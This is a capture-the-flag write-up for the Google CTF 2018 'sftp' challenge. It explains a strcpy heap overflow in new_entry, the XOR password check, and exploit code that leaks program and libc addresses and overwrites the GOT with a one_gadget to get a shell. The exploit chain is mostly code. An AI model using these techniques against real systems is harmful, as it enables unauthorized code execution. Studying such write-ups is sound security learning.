Rating: 5.0

# Introduction
This poc only use one vulnerability in the function `new_entry` to get the shell.
The copy of name can bypass the length limitation of name field.
#define name_max 20
*child = malloc(sizeof(entry));
(*child)->parent_directory = parent;
(*child)->type = INVALID_ENTRY;
strcpy((*child)->name, name);
# Login
After running the binary we are shown what looks like a standard ssh login. We have to calculate the password to get in.
The authenticity of host 'sftp.google.ctf (' can't be established.
ECDSA key fingerprint is SHA256:+d+dnKGLreinYcA8EogcgjSF3yhvEBL+6twxEc04ZPq.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'sftp.google.ctf' (ECDSA) to the list of known hosts.
[email protected]'s password:
The password is calculated with `xor`, and finally compared with `0x8DFA`. It can be solved by angr or z3, even by yourself.
Finally I figure out one of the passwords is `\x77\x10\x10\x10\x1d`.
if ( !(unsigned int)__isoc99_scanf("%15s", &v5) )
return 0LL;
v3 = _IO_getc(stdin);
LOWORD(v3) = v5;
if ( !v5 )
return 0LL;
v4 = 0x5417;
v3 ^= v4;
v4 = 2 * v3;
LOWORD(v3) = *v0;
while ( (_BYTE)v3 );
result = 1LL;
if ( (_WORD)v4 != 0x8DFAu )
return 0LL;
# Leak the address of entry
After login the sftp, we can get the source can in `src/sftp.c`. As mentioned before, we find the function `new_entry` can set up an entry whose name length longger than `name_max`.
According to the `entry struct` and `link_entry struct`, we find that the entry address can be leaked by symlinking a directory/file.
p.recvuntil('sftp> ')
p.sendline('symlink /home/c01db33f /home/c01db33f/'+'a'*20)
p.recvuntil('sftp> ')
addr = u64(p.recv(4)+'\x00'*4)
struct entry {
struct directory_entry* parent_directory;
enum entry_type type;
char name[name_max];
struct link_entry {
struct entry entry;
struct entry* target;
To get the base address of program, we should get the `parent_directory` of the `/home/c01db33f` entry.
# Leak any address content
To leak any address content, we also use the function `new_entry`.
We find that when the number of child is bigger than `0x10`, it will do realloc, and double the child number.
directory_entry* parent = find_directory(path);
entry** child = NULL;
for (size_t i = 0; i < parent->child_count; ++i) {
if (!parent->child[i]) {
child = &parent->child[i];

if (!child) {
directory_entry* new_parent = realloc(parent, sizeof(directory_entry) + (parent->child_count * 2 * sizeof(entry*)));
if (parent != new_parent) {
update_links((entry*)parent, (entry*)new_parent);
parent = new_parent;

for (size_t i = 0; i < parent->child_count; ++i) {
parent->child[i]->parent_directory = parent;

child = &parent->child[parent->child_count];
parent->child_count *= 2;
So we can make a directory with a long name. The name has to cover 17 childs, and end with the `address-12`.
Then make 17 directories under that directory. The content can be leaked by the command `ls`.
So we can leak the address of program and libc.
struct directory_entry {
struct entry entry;

size_t child_count;
struct entry* child[];
def leak(addr):
p.recvuntil('sftp> ')
p.sendline('mkdir '+'b'*164+p64(addr-12))
p.recvuntil('sftp> ')
p.sendline('cd '+'b'*20+'\x10')
for i in range(0,17):
p.recvuntil('sftp> ')
p.sendline('mkdir '+str(i))
p.recvuntil('sftp> ')
addr = p.recv(6)+'\x00'*2
# Got hijacking
Now we have the address of program and libc. To get the shell, we can hijack the got.
How to overwrite the Got?
* With the command `put`, we can upload a file whose length is longger than `sizeof(file_entry)`.
struct file_entry {
struct entry entry;

size_t size;
char* data;
* Leak the data address in the file_entry
p.recvuntil('sftp> ')
p.sendline('symlink fake_file '+'d'*20)
p.recvuntil('sftp> ')
put_file = u64(p.recv(4)+'\x00'*4)
print hex(put_file)
fake_file = u64(leak(put_file+40)[0:4]+'\x00'*4)
print hex(fake_file)
* With the method of leaking, make a directory include the `data` as a child. And leak the directory address.
p.recvuntil('> ')
p.sendline('cd /home/c01db33f')
p.recvuntil('sftp> ')
p.sendline('mkdir '+'e'*164+p64(fake_file))
p.sendline('symlink '+'e'*20+'\x10 '+'c'*20)
p.recvuntil('sftp> ')
dir_addr = u64(p.recv(4)+'\x00'*4)
print hex(dir_addr)
* Rewrite the uploaded file as a fake file_entry. The `data` of fake file_entry is the address of got(printf).
fake_entry = p64(dir_addr) + p64(0x6161616100000002) + p64(0)*2 + p64(16) + p64(base+0x2050b0)
p.recvuntil('sftp> ')
p.sendline('put fake_file')
* Make 17 directoryies, and rewrite the fake file with one_gadget address(Got hijacking).
p.recvuntil('sftp> ')
p.sendline('cd '+'e'*20+'\x10')
for i in range(0,17):
p.recvuntil('sftp> ')
p.sendline('mkdir '+str(i))
p.recvuntil('sftp> ')

p.recvuntil('sftp> ')
p.sendline('put aaaa')

Original writeup (https://github.com/zounathtan/ctf/tree/master/writeups/2018/google_ctf/sftp).